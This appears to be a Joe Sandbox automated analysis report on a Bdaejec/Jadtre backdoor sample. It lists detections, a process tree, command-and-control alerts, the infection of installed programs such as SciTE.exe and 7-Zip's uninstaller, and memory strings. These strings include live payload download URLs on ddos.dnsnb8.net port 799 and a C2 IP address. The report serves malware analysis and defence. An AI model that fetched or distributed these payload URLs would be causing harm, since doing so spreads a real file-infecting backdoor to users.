Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aRxo3E278B.exe

Overview

General Information

Sample name:aRxo3E278B.exe
renamed because original name is a hash value
Original sample name:2024-12-28_93bc13a5ccf808ac29d512748221ce1d.exe
Analysis ID:1581654
MD5:93bc13a5ccf808ac29d512748221ce1d
SHA1:bff2313cab29f6301d4131eb2f211d4b26743a90
SHA256:65214c3035c0f49f04a69d0c23f90f5b2b0135b706991ce5a9842fc6e4a077ed
Tags:backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • aRxo3E278B.exe (PID: 2936 cmdline: "C:\Users\user\Desktop\aRxo3E278B.exe" MD5: 93BC13A5CCF808AC29D512748221CE1D)
    • rbQTKRDg.exe (PID: 5580 cmdline: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 6032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: rbQTKRDg.exe PID: 5580JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:25:01.831265+010028079081Malware Command and Control Activity Detected192.168.2.64970744.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:25:00.452922+010028385221Malware Command and Control Activity Detected192.168.2.6521591.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: aRxo3E278B.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar)lZAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarpAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar9Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarelAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarVAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeReversingLabs: Detection: 97%
    Source: aRxo3E278B.exeReversingLabs: Detection: 97%
    Source: aRxo3E278B.exeVirustotal: Detection: 88%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: aRxo3E278B.exeJoe Sandbox ML: detected
    Source: aRxo3E278B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_008F29E2
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_008F2B8C
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.6:52159 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.6:49707 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
    Source: global trafficTCP traffic: 192.168.2.6:49707 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_008F1099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: rbQTKRDg.exe, 00000001.00000003.2098676346.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar)lZ
    Source: rbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar9
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarel
    Source: rbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
    Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_1b40cb0c-d

    System Summary

    barindex
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: rbQTKRDg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00417B710_2_00417B71
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_004073200_2_00407320
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F60761_2_008F6076
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F6D001_2_008F6D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: String function: 0040379C appears 32 times
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384
    Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: aRxo3E278B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: rbQTKRDg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: rbQTKRDg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: rbQTKRDg.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/11@1/1
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_008F119F
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580
    Source: C:\Users\user\Desktop\aRxo3E278B.exeFile created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeJump to behavior
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCommand line argument: Z@0_2_00405A30
    Source: C:\Users\user\Desktop\aRxo3E278B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: aRxo3E278B.exeReversingLabs: Detection: 97%
    Source: aRxo3E278B.exeVirustotal: Detection: 88%
    Source: unknownProcess created: C:\Users\user\Desktop\aRxo3E278B.exe "C:\Users\user\Desktop\aRxo3E278B.exe"
    Source: C:\Users\user\Desktop\aRxo3E278B.exeProcess created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384
    Source: C:\Users\user\Desktop\aRxo3E278B.exeProcess created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeJump to behavior
    Source: C:\Users\user\Desktop\aRxo3E278B.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeUnpacked PE file: 1.2.rbQTKRDg.exe.8f0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409607
    Source: initial sampleStatic PE information: section where entry point is pointing to: wu
    Source: aRxo3E278B.exeStatic PE information: section name: wu
    Source: rbQTKRDg.exe.0.drStatic PE information: section name: .aspack
    Source: rbQTKRDg.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.1.drStatic PE information: section name: PELIB
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.1.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00416E7B push ebp; ret 0_2_00416E7E
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_00416E85 push 00000000h; ret 0_2_00417296
    Source: C:\Users\user\Desktop\aRxo3E278B.exeCode function: 0_2_004037E1 push ecx; ret 0_2_004037F4
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F1638 push dword ptr [008F3084h]; ret 1_2_008F170E
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F600A push ebp; ret 1_2_008F600D
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F2D9B push ecx; ret 1_2_008F2DAB
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeCode function: 1_2_008F6014 push 008F14E1h; ret 1_2_008F6425
    Source: aRxo3E278B.exeStatic PE information: section name: wu entropy: 6.935419512952454
    Source: rbQTKRDg.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934288105896135
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.9347317483471365
    Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.93455810695625

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\Desktop\aRxo3E278B.exeFile created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
